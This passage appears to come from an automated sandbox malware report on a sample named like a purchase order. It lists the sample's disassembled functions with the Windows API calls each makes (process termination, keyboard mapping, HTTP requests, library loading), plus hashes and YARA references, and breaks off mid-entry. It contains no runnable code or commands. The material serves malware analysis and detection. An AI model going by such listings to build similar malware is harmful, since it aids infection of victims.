                                                                    • Instruction Fuzzy Hash: 20018875E00309BBEB105BA69C49B5EBFB8EB48311F004076FA04E7291D6309D11CFA0
                                                                    Function 00C30162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C30193
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C3019B
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C301A6
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C301B1
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C301B9
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C301C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: fc17ef7a635e52380f69e357eda00edf8ed1988be418d017a0495cfcdae8468b
                                                                    • Instruction ID: 89d85e25152b73394363d44d3913847edf830fd37ea548ee8650d962df9a37a7
                                                                    • Opcode Fuzzy Hash: fc17ef7a635e52380f69e357eda00edf8ed1988be418d017a0495cfcdae8468b
                                                                    • Instruction Fuzzy Hash: 4E0148B09017597DE3008F5A8C85B56FEB8FF19354F00415BA15887941C7B5A864CBE5
                                                                    Function 00C753E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C753F9
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C7540F
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00C7541E
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7542D
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C75437
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7543E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 5b8e187c6d8b451168b08a68e8ccd8a05bfc7de24e3534fe67ecb9501031700e
                                                                    • Instruction ID: eb9597df9fc6c6838d45d2f588923c4065ed644076cd60ce17f26ba41f8b0d33
                                                                    • Opcode Fuzzy Hash: 5b8e187c6d8b451168b08a68e8ccd8a05bfc7de24e3534fe67ecb9501031700e
                                                                    • Instruction Fuzzy Hash: 3FF03032641658BBE7215BA2DC0DFEF7B7CEFC6B11F00016EFA14D1061D7A51A0286B5
                                                                    Function 00C77230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00C77243
                                                                    • EnterCriticalSection.KERNEL32(?,?,00C20EE4,?,?), ref: 00C77254
                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00C20EE4,?,?), ref: 00C77261
                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C20EE4,?,?), ref: 00C7726E
                                                                      • Part of subcall function 00C76C35: CloseHandle.KERNEL32(00000000,?,00C7727B,?,00C20EE4,?,?), ref: 00C76C3F
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C77281
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00C20EE4,?,?), ref: 00C77288
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: 7ab1756b1b52eea2269aecd997291079406a0dc3a16f2606f8cc46b53d750e62
                                                                    • Instruction ID: 8cfeca2c437da8f56193c6459f251342d62f3ca52d0043d6ff63bc409005a1ad
                                                                    • Opcode Fuzzy Hash: 7ab1756b1b52eea2269aecd997291079406a0dc3a16f2606f8cc46b53d750e62
                                                                    • Instruction Fuzzy Hash: 9AF05E36540A12EBD7121B64ED4CBDE7729FF45702B10063BF603D10A1CB766912CB50
                                                                    Function 00C68992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C6899D
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00C689A9
                                                                    • CloseHandle.KERNEL32(?), ref: 00C689B2
                                                                    • CloseHandle.KERNEL32(?), ref: 00C689BA
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C689C3
                                                                    • HeapFree.KERNEL32(00000000), ref: 00C689CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: 1e95c315ee17b5e7dbd14053c5972e87d6e313eaf45be1d1be4b60e74b6592be
                                                                    • Instruction ID: c2ae64abe0ab52dfd0149d9321a0959099f70773d5231b3415b0c11393dad4a1
                                                                    • Opcode Fuzzy Hash: 1e95c315ee17b5e7dbd14053c5972e87d6e313eaf45be1d1be4b60e74b6592be
                                                                    • Instruction Fuzzy Hash: 01E05276104505FBDA021FF5EC0CB5EBB69FB89762B60863AF219C1470CB369462DB90
                                                                    Function 00C885ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00C88613
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00C88722
                                                                    • VariantClear.OLEAUT32(?), ref: 00C8889A
                                                                      • Part of subcall function 00C77562: VariantInit.OLEAUT32(00000000), ref: 00C775A2
                                                                      • Part of subcall function 00C77562: VariantCopy.OLEAUT32(00000000,?), ref: 00C775AB
                                                                      • Part of subcall function 00C77562: VariantClear.OLEAUT32(00000000), ref: 00C775B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4237274167-1221869570
                                                                    • Opcode ID: 9b7c84373c43d2b3ab2e6e1fdb5fccc357ec953868c5747be44470e51c0bebdb
                                                                    • Instruction ID: 8ecf91ae908ef6caee9fce32247410df4f05db45ff1b59ecc3127ee0c1420585
                                                                    • Opcode Fuzzy Hash: 9b7c84373c43d2b3ab2e6e1fdb5fccc357ec953868c5747be44470e51c0bebdb
                                                                    • Instruction Fuzzy Hash: 0F918E75604301DFCB10EF24C48495AB7F4EF89718F54892EF89A8B3A1DB31E94ADB52
                                                                    Function 00C72A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                    • _memset.LIBCMT ref: 00C72B87
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C72BB6
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C72C69
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C72C97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                    • String ID: 0
                                                                    • API String ID: 4152858687-4108050209
                                                                    • Opcode ID: d81cf86272c82e39d8519a31c7710dbdfd908693abe2a9337dcb2681c5f97b74
                                                                    • Instruction ID: 55d391421028701d3cb6df4f64a918b47cdc09777377595725d208e275443515
                                                                    • Opcode Fuzzy Hash: d81cf86272c82e39d8519a31c7710dbdfd908693abe2a9337dcb2681c5f97b74
                                                                    • Instruction Fuzzy Hash: C951C0716083019FE7269E28C845A6FB7E8EF65350F148A2DF8A9D3291DB70CE44E752
                                                                    Function 00C6D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6D5D4
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C6D60A
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C6D61B
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C6D69D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: 245593c9612ffcee14a12ea4dc5162536ba9e6061e1aa34a0f5da2f4b6faaca6
                                                                    • Instruction ID: e3df6da83d9ff2d7a7f1bbd328ae341710044ec8350ad306ef528632bbb14f6f
                                                                    • Opcode Fuzzy Hash: 245593c9612ffcee14a12ea4dc5162536ba9e6061e1aa34a0f5da2f4b6faaca6
                                                                    • Instruction Fuzzy Hash: 68417DB1A00205EFDB25CF54C8C8B9A7BA9EF44314F1585ADF90A9F205D7B1DA40CBA0
                                                                    Function 00C72753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C727C0
                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C727DC
                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00C72822
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CD5890,00000000), ref: 00C7286B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1173514356-4108050209
                                                                    • Opcode ID: b4886ae3501a577992a5e6173739bcd49a52a64aefb30cf3e387906e15ae284e
                                                                    • Instruction ID: e576adbed5139c5e706b166f7d84e177493b3482da9f4b481c64246e56921a76
                                                                    • Opcode Fuzzy Hash: b4886ae3501a577992a5e6173739bcd49a52a64aefb30cf3e387906e15ae284e
                                                                    • Instruction Fuzzy Hash: CB41AE722043419FD720DF25C884F5ABBE8EF85314F148A2EF8A9972D2D731A905DB63
                                                                    Function 00C8D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C8D7C5
                                                                      • Part of subcall function 00C1784B: _memmove.LIBCMT ref: 00C17899
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower_memmove
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 3425801089-567219261
                                                                    • Opcode ID: c6ed0eed1dc814a484a183d765a918a96083acf9788688969f73f16cc28458cd
                                                                    • Instruction ID: ae17c69f4bd93bddf0b601a9278aa2219ea9e96686ff9c30ae3fbe0ac3efc6d9
                                                                    • Opcode Fuzzy Hash: c6ed0eed1dc814a484a183d765a918a96083acf9788688969f73f16cc28458cd
                                                                    • Instruction Fuzzy Hash: AF319E71904619ABCF00EF54C8559EEB3B4FF05324F108669F836A76D1DB31AE05DB80
                                                                    Function 00C68E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C68F14
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C68F27
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C68F57
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 365058703-1403004172
                                                                    • Opcode ID: 1f70e6bae871eb1020526dbedb3a22591143faafec9189cdbdb6e11bcf632069
                                                                    • Instruction ID: 141653f875dc701d0cec3c2c55aaccf1edb2fc41de34cbb6c2bb22f1d4ab7b16
                                                                    • Opcode Fuzzy Hash: 1f70e6bae871eb1020526dbedb3a22591143faafec9189cdbdb6e11bcf632069
                                                                    • Instruction Fuzzy Hash: 4021E471A04108BEDB24ABB0DC89DFFB779DF46320F14462AF421A71E1DF35494AAA50
                                                                    Function 00C8182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8184C
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C81872
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C818A2
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00C818E9
                                                                      • Part of subcall function 00C82483: GetLastError.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C82498
                                                                      • Part of subcall function 00C82483: SetEvent.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C824AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3113390036-3916222277
                                                                    • Opcode ID: 9773757eb200906c178730e271be92a35d0cb03a3e6e3b9e405a42c85be4ee85
                                                                    • Instruction ID: 748d8bc9666c824815bab96fa9b8f4b1da43192cc14803bf6ee433c22effcc26
                                                                    • Opcode Fuzzy Hash: 9773757eb200906c178730e271be92a35d0cb03a3e6e3b9e405a42c85be4ee85
                                                                    • Instruction Fuzzy Hash: 3E21B0B1510208BFEB11AB61CC8AFBF77EDEB48749F14412AF805D7180DB208E0667B4
                                                                    Function 00C963E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
                                                                      • Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
                                                                      • Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C96461
                                                                    • LoadLibraryW.KERNEL32(?), ref: 00C96468
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C9647D
                                                                    • DestroyWindow.USER32(?), ref: 00C96485
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 4146253029-1011021900
                                                                    • Opcode ID: 8d1ddd41133344ffccb1b468bda381952ba8d5f7e73b4ee5d508719129b1e3e4
                                                                    • Instruction ID: 65daf98cc523315c56ca148d0b75c97c527f7747b0e9370b9549bc884331e71e
                                                                    • Opcode Fuzzy Hash: 8d1ddd41133344ffccb1b468bda381952ba8d5f7e73b4ee5d508719129b1e3e4
                                                                    • Instruction Fuzzy Hash: C7216D71210205BFEF108FA4DC98FBB77ADEB59764F104629FA60921E0D771DC51A760
                                                                    Function 00C76D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00C76DBC
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C76DEF
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00C76E01
                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C76E3B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: b760179bc1e2c045c5dfe079b50ce25c33b5ee8e9e36bddc1a11457280729cb9
                                                                    • Instruction ID: b46c799e0b1fe9950c99e2e23d9ac156278f2d9d4eba9f5cd77be016285c7d77
                                                                    • Opcode Fuzzy Hash: b760179bc1e2c045c5dfe079b50ce25c33b5ee8e9e36bddc1a11457280729cb9
                                                                    • Instruction Fuzzy Hash: CA218174600609AFDB309F29DC05B9E7BB4EF54720F20862AFDB4D72D0D77099519B60
                                                                    Function 00C76E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00C76E89
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C76EBB
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00C76ECC
                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C76F06
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: 7fedb044d3113df262f231ed60f07608639ef2cf42a80d9fca25c56654fcd849
